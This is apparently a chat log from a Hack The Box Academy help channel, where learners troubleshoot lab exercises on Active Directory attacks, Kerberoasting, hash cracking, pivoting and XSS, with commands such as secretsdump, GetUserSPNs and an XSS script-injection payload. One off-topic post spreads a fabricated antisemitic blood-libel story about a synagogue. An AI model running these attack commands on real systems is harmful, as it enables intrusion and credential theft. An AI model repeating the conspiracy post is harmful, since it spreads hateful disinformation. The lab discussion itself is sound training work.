https://dev.to/adamkatora/how-to-use-burp-suite-through-a-socks5-proxy-with-proxychains-and-chisel-507e

netexec

not sure what you try to do, but if I were to use burp + pivoting, I'd use ligolo. Because ligolo uses a tunnel interface + static routes, if burp is running on the same system, it will go through that tunnel

Any specific plugins ? i know spider_sense that list readable files but havn't found sth else

what info are you trying to get?

Trying to find a tool that does what snaffler does, that is look for passwords in files on smb share, but that can run on linux 🙂

that's just out of curiosity, I managed to run snaffler

oh that would have to read every file, don't know of any

Breaking News! Secret tunnels found under Chabad Lubavitch Synagogue in Brooklyn, NY. Child-sized blood-stained mattresses were found along with a baby high chair. It is believed these tunnels were used to traffick children and drugs. 10 Arrests were made after a riot broke out when NYPD arrived on the scene. DM For details and links.

cool story bro

hey guys.. a question. Do you experienced any latency issues between pwnbox and rdp connection on the target PC ?

to many disconnections

In module: ACTIVE DIRECTORY ENUMERATION & ATTACKS and section: DCSync. I can't do DCSync attack with secretsdump.py, I keep getting error:

Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:

[-] [Errno 13] Permission denied: 'inlanefreight_hashes.ntds'
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...```
But with mimikatz I have no problems.

you have no write permissions to the current dir

I launched new powershell as adunn user. Then SSH'd into linux and now it works

Doesnt make sense to me

chmod a+r inlanefreight_hashes.ntds

I retraced all my steps and works perfectly now. Problems was that I did not have write perms on current dir.

You can open them and check if they’re the same 🤷🏼‍♂️

I think you were executing it from the opt folder where you have no write permission

Yeah I think you are right

me again 🙂 I managed ot get system shell on SQL01 (AD Enum Attacks Skill assess 2), but now i'm not sure what's the next step

😉

Get bloodhound data from the sql01 system shell

See if you find something interesting

Thx will try, thought bloodhound collector needs to run into domain user context

oops was busy with something else, also trolled myself by automating it, you can dm

so after struggling for 1 hour to get the generated BH content (ended up using netcat) I don't really see what I can do.

What’s the question you need to answer

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

Exactly

So look for the path from sql to ms

Strange, for me it showed a “hassession”

I have no outbound objects from SQ01

Anyways, mssqlsvc can log in to ms01

It showed me from the data I collected

I don't think a machine can have session on another machine

you collectred with sharpound ?

Not sure why you don’t have it in your bloodhound data

If I remember correctly yes

MSSQLSvc is not a machine, it’s a user

yeah but they didn't search for edges between MSSQLSvc and ms01

I’m fairly sure it showed me the path from sql01 to ms01

MSSQLSvc user from sql01, that has a session on ms01

I'm not too sure but I think this search for first degree edges only

I believe my bloodhound version was different as well

for any edges use

MATCH (obj1), (obj2) WHERE obj1.name = '<name>' AND obj2.name = '<name>' AND NOT obj1 = obj2 MATCH p = shortestPath((obj1)-[*..10]->(obj2)) RETURN p

At least I didn’t do it like that

I use BLoodHound CE

so I guess mimikatz to dump some tickets ?

Go ahead and try

I use regular bloodhound still

I might want to install it, I think the new CE is more fancy, but either that's me or some features are missing

rn CE is really only useful if you know how to write your own queries, most of the baked in queires are missing

hello everyone, is everyone done the module called INJECTION ATTACKS ?

Alright then, I think i'll stick to old bloodhound til my brain accept to process those cypher stuff 😄

thks guys

can I get a hint on the credential search part of Windows Privilege Escalation Skills Assessment - Part I ? I think the creds will have to do with the installation of Apache Directory Studio but cant find them

no one completed the module called INJECTION ATTACKS? is from the web senior penetration tester new learning path

i am on my last skill assessment and i am legit stuck

As a side note, it seems this could have helped too 🙂

c:\Users\Administrator\Downloads>qwinsta
qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 console           mssqlsvc                  1  Active

if anyone has completed the module called INJECTION ATTACKS from the new learning path of Web senior penetration tester please kindly DM me. Thank you for your help.

What exactly is the problem?

Don’t know what this is

it's mentioned in ad module, in "Living Off The Land". Shows sessions to the host

Ahh👍🏼

@acoustic owl I am on my last skill assessment and I'm having an issue with the injections attack module, I am using this payload to obtain the flag [ <iframe src="http://127.0.0.1:8000/users" width="800" height="500"></iframe> ] however the /users doesn't seem to exist, I tried api/users still nothing, I am not sure where to look for the flag. I can run an LFI script in order to read etc/passwd and sure if i get the path for the flag I can read it, although I am not so sure what am I doing wrong?

Since you can use LFI, you can also read ||the PHP code. ||

Please send such spoilers with spoiler tags

sorry, I am new here, apologises. may I directly message you? is it possible?

No problem, nothing happened 🙂
Sure, send me a DM

thank you 🙂

sorry for asking here but i am new on this server and idk where i can ask for Machines i know this is HTB academy

Honestly web challenges are gonna be your closest proxy

Read #welcome

#boxes

thanks i didn't read that

Hopefully a simple fix but for the "Exploiting Web Vulnerabilities in Thick-Client Applications" module, I can't see the open button. I'm using the pwnbox and have maximised the app but I don't see anything at the bottom of the app window.

I think that walkthrough is related to the previous module. This is the module which has a SQL injection in a fat client.

My problem is basically that I can't see an open file button in the app window from the pwnbox.

that is the Fatty box

yeah. Maybe this is the wrong channel but I should see something like this in the screenshot. I'm not sure if this is just a pwnbox issue.

it's the right channel, the content is based on the fatty box, following a walkthrough of that would be your best bet

I completed the module a long time ago, but I would still be interested to see how you solved it

sure I'll dm you the script

did you find a response to this? I can't explain it either. Is this a mistake in the module?

Hi so about the module cracking passwords with hashcat my PC does not have a graphic card so cracking passwords takes ages so I wanted to know if there were free online solutions to crack passwords like we were able to do with Google colab

your pc will have a graphics card, else you won't be able to see anything, how fast is it is another question. and you won't find places that crack hashes for you for free, it costs money to do that

tehre's free tools that have a lot of pre-cracked pass though like crackstation

No I mean besides the pre built one, yes but like there might be some places that let u use a good graphic card like Google colab

Havent don't that last part, but I noticed using Responder at 1st step of this assessment that it was not printing the hashes into the termianl, because it was saying it's known hash. I had to check the Responder log to get the hash. Could be sth similar ?

if you find one let me know, I would love some free gpu power

There is google colab but they will ban u if u use hashcat with it

I guess you can use the 200$ gcp gives you when you create an account and get some VM with NVidia ML chips 😄

NMAP module from HTB Academy says an "NMAP Connect Scan (-sT) is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports. "

I find this confusing because if the firewall drops incoming packets (the initial syn packet) then the firewall wouldn't send an outgoing (syn-ack) anyways. So why is it saying a connect scan can bypass a firewall?

#modules message
but it's a good point, if it drops every incoming packet, the scan mode wouldn't matter

I think it makes sense if you have a firewall on the scanning host, becuase using system API will allow tcp/syn ack to be dynamically allowed

so maybe it should be attack, and not target host ? https://nmap.org/book/scan-methods-connect-scan.html

can i dm you for the script?

it's not a poisoned request, we just captured a SMB NTLMv2 challenge/response directed to that host only

sure I'll send it

I don't get it. sounds wrong to me

hello i'm doing the linux fundamental module i'm in the filter contents section and i'm stuck at the question
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."

i use the command ||grep "https://www.inlanefreight.com*/" test | uniq| wc --lines||

yep, the script to run that action is in C:\Users\Public\Documents\ on DC

combine what you have learned in that section, you'll need tr and grep

Password Attacks / Mutations
i mutated the provided passwords with the the given rules with hashcat
i try to brute user sam with hydra on shh and ftp, takes ages, still no valid pw, am i missing something or do i just need to be patient? 😄

ok got it after more than 20 mins with 48 threads

anoyne here understand why this command doesnt dump the kerberos tgs ticket?

proxychains impacket-GetUserSPNs -target-domain inlanefreight.local inlanefreight.local/ -request-user SAPService

did you give user:pass? also you need the domain added in hosts, try with -dc-ip <ip>

oh shit

i swear i added that

this still doesnt work

proxychains impacket-GetUserSPNs -dc-ip 172.16.5.5 inlanefreight.local/ -request

i tried the exact one on the cource as well

if there is any difference

what's the error

also without proxychains but in the ssh connection

[-] invalid principal syntax

yeah cause you didn't give user:pass
GetUserSPNs.py '<domain>/<usernanme>:<password>' -dc-ip <ip> -request-user <username>

i dont have any valid creds i belive

for the dc

only ssh

you can't kerberoast without domain creds

^

The ad modules use the same creds over again

Fwiw

thats what confusing me, since in the cource it just uses GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

i realize forend is a user but i dont see a password

Which you should have his password

From another point in the module 😉

ah jesus

i havent saved any creds

You should always save creds

Password Attacks should have been a good lesson in that lol

lol

i too experienced pain there

it should be in the earlier section

got it

thanks!

i got it with this command ||grep -o 'https://www.inlanefreight.com[^"]*' test | sort -u | wc -l||but i searched on internet and used regex and at this section I was supposed to do it without knowing what is regex can someone give me an idee on how to do it without regex

use tr and grep like I said

you can use tr "'\"" "\n" to separate the html elements sand grep the url, then sort unique and count

oh thanks I would never have thought of doing that

Hello there , for those who have made "SMTP Header Injection" on HTTP Attacks , is mail.smtpinjection.htb working properly ? i could not see any emails, thanks an advance
Edit: restart lab solved

cock

Great contribution

How do you figure out what is left to do in a module? I've gotten all the way to the end of the Windows Privilege Escalation module. Everything is checked green but when I click finish and go look at my Modules it still shows as in progress. If I click continue it just brings me to the first page of the module.

click the mark complete button at the bottom right

The last page doesn't have a mark complete. It has a Finish. When I click Finish, it brings be to the module home page. It shows a progress bar that is almost all green except for a bit at the end, and a green continue button.

then you probably missed a section somewhere, check the table of contents, they should all have a green checkmark

I did copy the hash but I don't understand why it's acting up. i use hashcat -m 7300 -a 3 --username ./hash.txt footprinting-wordlist.txt but nothing

attack mode 3 is for masks, if you're using a dict it should be 0

i use 0 too but nothing :/

nothing means what? what's the error

it's not in the wordlist then, use a bigger one like rockyou

OWwwwwh thanks bro 😭

hashcat -m 7300 -a 0 --username ./hash.txt /usr/share/wordlists/rockyou.txt

this is run

PASSWORD ATTACKS >> Credential Hunting in Linux >> Credential Hunting in Linux >> Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Hello guys. I have SSH'd to kira and have found the password through hydra. Now I'm not sure what to do and how to get the password for Will. Can someone please help?

Hey, I'm doing the Intro to the Windows command line. Having a hard time understanding the "Finding & filterint content" section. To be more specific this is what I'm strugling to understand. Does anyone have a better explanation or maybe a yt video that goes through this specific section? https://i.imgur.com/LEcMjLj.png

When the loner it goes, the longer it takes.

I'll do it the smarter way now lol... i was just running it on the background, but this is pretty funny

these are common elements in object oriented programming(OOP), you can google/watch videos on what each term means and how they are used in OOP

set a limit on it so it wouldn't take as long, -T4 or --min-rate 1000

oh, what does that do?

I did the "smart" way and already got my output.. just wondering what your suggestion does

https://nmap.org/book/man-performance.html
https://nmap.org/book/performance-timing-templates.html

oh, maybe that's in the next section called "performance" lol

Thanks

thanks

first letter should be caps

nope i tried that now and thank god it doesn't work 😆

oh it's a l

did you type that out by hand?

yea that was a correct answer thank you

should delete that first message

still looking for any tip. Any help is appreciated!

firefox

Hey all, can someone help me with the XSS - Phishing lab?
I'm not getting the provided site to allow for multiple DOM Commands.
I've tried copy/pasting the documentation and fiddling with this on my own most of the day.

Thanks if advance.
I apprecaite it.

can you explain further please?

read back the section

wdym by multiple dom commands? following the example given will get you pretty close

can someone please help me with the 'Advanced XSS and CSRF Exploitation' - 'CORS Misconfigurations' section? I am having a hard time understanding the challenge.

If I understand correctly, I can combine the **document.write('...') ** and document.getElementById('urlform').remove() into one line. The two commands are separated by a semicolon ';'.

I can get the first command to work, but whenever I add the second, separated by the semicolon it fails and outputs the second command onto the webpage.

Thanks for the quick follow-up and I hope I explained what I'm going through well enough.

escape the <img src=''/> and put your xss payload in a script tag

'/><script>document.write('...');document.getElementById('...')</script>

reading the page source will help you here

Hey once again thank you for responding!

I was running

' onerror=<script>document.write('...');document.getElementById('...').remove()</script>

The forward slash is cool, thanks for that!

I see that with your command, we are closing the image tag all together and then opening a script block.
Thanks for your quick and detailed help @next bronze !
I really appreciate it

if you sovled this can I dm you I need help to sovled this

This, under Scan by using a different source IP:

sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0

Uses 10.129.2.200 as the source ip, and sends things trough the tun0 interface.

How would this work? how would the packets get back to us since it's using a different source address (from a networking point of view)? Is there some inherent pivoting I'm not getting?

Anyone able to help with the advanced xss and csrf module? Specifically the SameSite cookie bypass question on the Misc CSRF Exploitation page. I think I understand the content, but I am struggling with the lab because the profile page just redirects to login and I can't verify the correct way to "promote" my user to admin.
It seems to hint at making use of the client-side redirect, but that doesn't seem to work for me.

So far I think I'm supposed to download firefox dcerypter onto target machine but python file server does not run on the target machine...?

how can I transfer files from attack machine to target machine with python file server?

nvm I just copied the python code straight from attack machine, created a file onto target machine and pasted the code in a file on desktop directory.

Can anyone tell what's wrong in this?
curl "https://www.inlanefreight.com" | grep "https://www.inlanefreight.com/" | sort -u | wc -l 2>/dev/null

So I am on Attacking Common Services Easy, I was able to get the flag but there are multiple ways to get the flag and the second way is unknown to me, I would love if someone who has completed this can message me and we can discuss the way I solved it and potentially the second way I dont know about.

For anyone stuck in future with the question about bypassing samesite cookies - the answer is indeed the client-side redirect. Payload delivered via the exploit server. The issue I had was that the php session cookies weren't being applied for some reason! I had to manually create the session cookie in the header for the request to profile.php in order for it to work. Not sure if this was an intended thing to make it harder, or something weird with the way it works with firefox, but either way, should save others in future the time I spent going down rabbit holes thinking I had done something wrong haha

I don't think it will actually work
https://nmap.org/book/man-bypass-firewalls-ids.html

Note that you usually won't receive reply packets back (they will be addressed to the IP you are spoofing), so Nmap won't produce useful reports.

run the command without wc -l

probably just referring to different ways to get access, add user, revshell, etc

Thanks, didnt know if there was an additional "in" I wasnt tracking

not that that I'm aware of

why? I need to count the number of results

so that you know what's wrong with it?

uh so it gives me this

curl -s "https://www.inlanefreight.com" | grep -oE "https://www\.inlanefreight\.com[^\"']+" | sort -u | wc -l
this is the thing that is correct but Idk why

Hey guys I am working on finishing the Introduction to Windows Command Line. I have made it all the way to the skills assessment, but how do I complete this task? "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them."

I can't find any additional resources online and am completely stuck to what to do. How do I ssh into the domain controller? How do I find the username to be able to ssh? I logged into user7 but can't do the DC

[^\"']+ matches until single or double quotes
https://regex101.com/

I am stuck in the Introduction to Digital Forensics course's 1st question .I finished the entire exercise, and I must find what is the name of the first scheduled task of Velociraptor. That name is nowhere to be found and I pointed it out to HTB. Am I the only ine?

ok, thx

hello im new to the server. not sure if this is the right place to ask a question but trying to do the starting point Meow module, but every time i run the nmap command on the vm provided by HBK, it does not show me ports. Not shown: 1000 filtered tcp ports (no-response) and all 100 scanned ports are in ignored states. when i do nmap on google and others, it shows the ports.

is it me or the machine bugged or something

The best place to ask questions about the Starting Pint is here #starting-point
If you don't have access, then read and follow #welcome

This Question?

Visit the URL "https://127.0.0.1:8889/app/index.html#/search/all" and log in using the credentials: admin/password. After logging in, click on the circular symbol adjacent to "Client ID". Subsequently, select the displayed "Client ID" and click on "Collected". Initiate a new collection and gather artifacts labeled as **"Windows.KapeFiles.Targets" **using the _SANS_Triage configuration. Lastly, examine the collected artifacts and enter the name of the scheduled task that begins with 'A' and concludes with 'g' as your answer.

For this question you have to do the same as explained in the lesson, but with the parameters specified in the question.

I did. I succeeded. Several times No word starting with 'A' and finishing with 'g' appears at any point.

You're probably looking in the wrong place

I am sure you are right. What I do is - as advised - reproduce what is demonstrated in the lesson, and I manage to do it. I looked at every screen, every tab: If that is not the right place, what is?

hi everyone, did anyone pass the footprinting medium? i found a lot of info but i can't connect to the mssql server, i did the mount on the samba server and i found some info there, i tried to connect with cred that i found to rdp it doesn't work i don't know what to do ...

https://academy.hackthebox.com/module/112/section/1079

hi guys

why cant i Import-Module .\Invoke-TheHash.psd1
im on password attacks

im in the c:\tools\invokethehash

i run the cmd import and nothing shows up then i push the normal cmd with the module then ti says Invoke-SMBExec : The term 'Invoke-SMBExec' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1

• Invoke-SMBExec -Target DC01 -Domain INLANEFREIGHT -Username julio -Ha ...

•   + CategoryInfo          : ObjectNotFound: (Invoke-SMBExec:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

it dont connect back to me

You have to create a new collection with the parameters of the question. Then look in the path where the Schedule Tasks are stored.

Well, OK for the collection: I created it. But I am sure I have no idea what "path where the scheduled rasks are stored" you are referring to: nothing of the sort appears. But I also understand that this is as far as I can bother you with this question. I think I will just go hit my head againt the wall a bit more 🙂 Thank you for your help all the same: much appreciated.

Just use google
For example || https://superuser.com/questions/1656494/where-are-scheduled-tasks-stored-in-an-offline-windows-10-partition-hard-drive ||

Hi folks, i'm trying to use the "old" bloodhound version for AD Module, however I can't upload files. I tried both from Kali or a Windows machine (neo4j db is on kali though) and upload is stuck at 0%. Any tips ?

The Data Collector (eg. Sharphonund) and the version of Bloodhound must match.

Thank you very much again. I thought the answer was to be found while I was going through the motions described in the lesson. I was obviously mistaken!

The lesson shows the concept and the technique. The questions are structured so that you have to apply the concepts and techniques yourself. This way you can also check whether you have understood everything correctly

Well, then I am a lost cause: after going through the 3xercise 10 times I still do not understand where the answer can be found

Send me a DM and I will try to guide you. I don't want to spoil anything here

Ok I'll try with proper collector then, but shouldn't it show an error rather than just hang ?

anyone ?

RDP should work with the creds. Do you have the right creds?
|| User A***? ||

Hint: ||smb||

Works now thanks mate 🙂

need help of mudules which are unlocked

@analog dock @next bronze FYI I checked with older bloodhound 4.3.1, it does not find path from SQL01 to MS01 (For AD Attacks enum skill 2 assessment). Shows no sessions in legacy bloodhound either. Marking SQL01 as owned makes no diff.

@full nimbus can u help me out with this?

I don't understand your question 🙂

How to start

https://academy.hackthebox.com/faq

where to start HTB or HTB accadmy

yess i use a tools remmina i was able to connect now i'm blocked on the mssql server connection

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Your user obviously has no rights to do this. Find more ways 😉

i run it as admin ? but i dont have a password

Sometimes users/admins are lazy and use the same password for different accounts

i use a password by alex but nothing

try looking around the filesystem for an IMPORTANT FILE

hey guys, someone up for helping me with Double Pivot?

Okay, I'm looking for

Me again (still SkilL2 assess AD Enum / attacks) , I've dumped the MsCacheV2 hash of mssqqlsvc user on SQL01 using mimikatz # lsadump::cache however I can't crack it with hashcat + rockyou. Tried to use this hash directly has well with winrm but didn't worked

some pointer would be welcomed 🙂

Sorry. What is a "DM"?

Direct Message

hhhmm
then no??

@umbral fulcrum what do you need ?

I need cobalt assessment report

I did "The Double Pivot" as mentions in the "Attacking Enterprise Networks" modlue ==>> "Post-Exploitation" section

on a different environment but it doesn't work, I'm kinda lost on it

flag ^^'

So I used sekurlsa::logonpasswords instead, and got a hash for PTH in the end 🙂

medium it's hard so what will the hard level be lol

read the engagement carefully it'll definitely help understand what the missing pieces may be to start off

Haven't done this module, but an important thing to remember is let's say you have box A <=> B <=> C. Box C doesn't have a route back to box A. You need to use B as a relay somehow, ligolo / chisel can listen on a port that would forward back to A, which is kind of doing a network PAT

yes
actually I have box D also ...

then C could be a relay to B etc ...

yess i had read it but i went into a dead end at the beginning of my enumeration thinking i had to connect with the rpc client then i wanted to connect to xfreerdp it didn't work and i did my research on the wonderful remmina tool and it saved my life

anyone have all modules of HTB Acadamy ?

maybe? there's a fair bunch of em ¯_(ツ)_/¯

shall u provide

no, that's against ToS

besides: if you're looking to do the certification exams: you're gonna have to do them on your own account

no i need modules to learn

the tier 0 modules are all free

for basics

i finished it

and relatively speaking Academy is cheaper than most other paid platforms

if you're a uni student and have an academic email ==> that's the best deal

but i dont have a single penny

skill issue then

Then you have no choice but to buy cubes or take out a subscription

where is it

?

i'm talking about having an email provided by your university

yes I did

but dones't work 😦

Are you a student and do you have a student email?

what is student mail

no idont have

then get a job or find someone to pay for the sub for you ¯_(ツ)_/¯

there is any opt to get it free

nope

Then there's nothing that can be done, save up some money, if you're not a student, platinum sub is the best deal. In the meantime, there are other platforms with free content

occasionally HTB does giveaways

that needs skills

but also: if you find a bug on the platform and report it you can maybe ask for one

@fathom pendant can u teach me

?

not for free

https://www.hackthebox.com/blog/htb-seasons-announcement

reallly

really

the extent of any free help i offer is module assistance (because I can't charge money for that)

its out my skills

are u giving it free

I have some skills of gfx

lol dude seriously

I only offer help in the public forum

:)

you'd need to have the module unlocked for me to assist you with it; which requires buying them

I thought I am am included n public

you misunderstood

Not enough cubes i have

just 70

https://tenor.com/view/spiderman-tobeymaguire-imissedthepartwherethatsmyproblem-gif-9838697

guys seriously :::(

what's up?

it's just weird to see this kind of conversation here

this is thereal hacker I thought

it's not uncommon

you aren't owed anyone to teach you things for free

i think TryHackMe has a bunch of free stuff

there is only theory

¯_(ツ)_/¯

That's not true, there's plenty of free challenge rooms there

So, now once again in all clarity:

The Academy offers a few modules free of charge. Once you have done these, you have no choice but to buy further modules.

If you need help with one of the modules, you can ask for help here and someone will help you find the right answer.

bro , it's what it is you need to pay for modules beyond tier 0 , maybe you can use other platforms like portswigger , maybe some free room in thm

Good point, Portswigger is completely free and a very good platform

any other other that is free

course or whatever lese

else*

We just told you

just bear in mind price doesn't equate to quality (though i've heard nothing but good things about PortSwigger ¯_(ツ)_/¯

thnx

idk just google it , you can always find good resources

and being honest a lot of courses are just pulling together already existing resources

how professional u are

just a beginner

i.e. pulling together knowledge of HTTP requests and making the information more easily digestible

People here are volunteering their time to help

i dont think

hahahahahahaha

it's not hard to reach hacker rank on HTB ¯_(ツ)_/¯

just a handful of active easy boxes and challenges and you're there

what is ur os

OS doesn't matter

at least, linux distro doesn't

really not

Hello my friend 👋 You know portswigger requires subscriptions, because to complete some lab requires professional burp suite but in hackthebox tier 2 xss module I complete similiar task without using professional burp suite.

but as a rofessional which u recommend

there's people that hack off Macs, Windows too

¯_(ツ)_/¯

yeah , once you try to move to the next rank , you start feeling the pain